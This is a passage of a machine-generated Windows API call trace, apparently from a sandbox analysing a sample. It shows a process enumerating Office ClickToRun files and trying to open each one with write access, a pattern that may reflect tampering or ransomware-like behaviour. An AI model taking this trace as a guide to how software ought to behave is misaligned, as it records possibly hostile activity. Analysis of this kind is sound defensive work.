Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.270] AreFileApisANSI () returned 1 [0079.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll", lpUsedDefaultChar=0x0) returned 71 [0079.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0079.270] AreFileApisANSI () returned 1 [0079.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.270] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0079.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 71 [0079.270] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.270] GetFileType (hFile=0x430) returned 0x1 [0079.270] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0079.271] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.271] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.271] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.271] CloseHandle (hObject=0x430) returned 1 [0079.271] AreFileApisANSI () returned 1 [0079.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.271] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a8c0 [0079.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d688, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll") returned 71 [0079.271] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.272] GetLastError () returned 0x20 [0079.272] GetLastError () returned 0x20 [0079.272] SetLastError (dwErrCode=0x20) [0079.272] GetLastError () returned 0x20 [0079.272] SetLastError (dwErrCode=0x20) [0079.272] GetLastError () returned 0x20 [0079.272] SetLastError (dwErrCode=0x20) [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0079.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.272] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c4400, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0079.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.273] AreFileApisANSI () returned 1 [0079.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll", lpUsedDefaultChar=0x0) returned 71 [0079.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0079.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0079.273] AreFileApisANSI () returned 1 [0079.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.273] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a498 [0079.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 71 [0079.273] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.273] GetFileType (hFile=0x430) returned 0x1 [0079.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0079.274] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.274] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.274] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.274] CloseHandle (hObject=0x430) returned 1 [0079.274] AreFileApisANSI () returned 1 [0079.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0079.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a660 [0079.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=71 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll") returned 71 [0079.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcr120.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0079.275] GetLastError () returned 0x20 [0079.275] GetLastError () returned 0x20 [0079.370] SetLastError (dwErrCode=0x20) [0079.371] GetLastError () returned 0x20 [0079.371] SetLastError (dwErrCode=0x20) [0079.371] GetLastError () returned 0x20 [0079.371] SetLastError (dwErrCode=0x20) [0079.371] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0079.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.433] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.433] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x5b1068, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="OfficeC2RClient.exe", cAlternateFileName="OFFICE~1.EXE")) returned 1 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0079.433] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0079.433] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0079.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0079.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0079.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0079.451] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.451] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0079.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.452] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0079.452] AreFileApisANSI () returned 1 [0079.452] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe", lpUsedDefaultChar=0x0) returned 78 [0079.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0079.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0079.452] AreFileApisANSI () returned 1 [0079.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.452] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.452] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0079.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.453] GetFileType (hFile=0x430) returned 0x1 [0079.453] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.453] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0079.453] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0079.454] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0079.454] CloseHandle (hObject=0x430) returned 1 [0079.454] AreFileApisANSI () returned 1 [0079.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0079.454] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x2e430 [0079.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d478, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe") returned 78 [0079.454] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0079.454] GetFileType (hFile=0x430) returned 0x1 [0079.454] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0079.454] CloseHandle (hObject=0x430) returned 1 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0079.455] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0079.455] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0079.456] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0079.456] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 